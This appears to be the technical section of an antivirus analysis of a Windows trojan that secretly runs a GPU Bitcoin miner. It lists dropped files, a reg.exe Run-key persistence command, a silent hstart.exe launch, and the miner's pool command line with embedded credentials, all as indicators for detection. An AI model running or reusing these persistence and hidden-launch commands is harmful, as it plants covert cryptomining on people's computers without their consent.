Technical Information
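- Autorun entry (a value under the HKLM Run key is launched at each user logon; it is the value written by the reg.exe command listed below): [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'system32' = 'C:\Geforce\system32.bat'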
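- 'C:\Geforce\system.exe' -t 2 -v -g yes -T 99 -o http://al###########oo.com:Aeyeeee90@50btc.com:8332 (the -o value is a URL of the form http://<user>:<password>@<host>:<port>, so the account name and password used for the remote service are visible in the process command line; together with miner.dll and the phatk.cl / phatk.ptx files listed below, this is consistent with a GPU Bitcoin miner)
- 'C:\Geforce\hstart.exe' /NOCONSOLE /SILENT "C:\Geforce\system.exe -t 2 -v -g yes -T 99 -o http://al###########oo.com:Aeyeeee90@50btc.com:8332" (hstart.exe wraps the same system.exe command line; judging by its /NOCONSOLE and /SILENT switches, it starts it without a visible console window)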
- '<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows\currentversion\run" /v "system32" /t reg_sz /d C:\Geforce\system32.bat /f
- '<SYSTEM32>\cmd.exe' /c ""C:\Geforce\system32.bat" /Geforce/system32.bat"
- C:\Geforce\system.exe
- C:\Geforce\system32.bat
- C:\Geforce\usft_ext.dll
- C:\Geforce\phatk.ptx
- C:\Geforce\hstart.exe
- C:\Geforce\miner.dll
- C:\Geforce\phatk.cl
- Network endpoint: '50##c.com':8332 (the same port as in the -o URL of the system.exe command line above)
- DNS query (ASK): 50##c.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''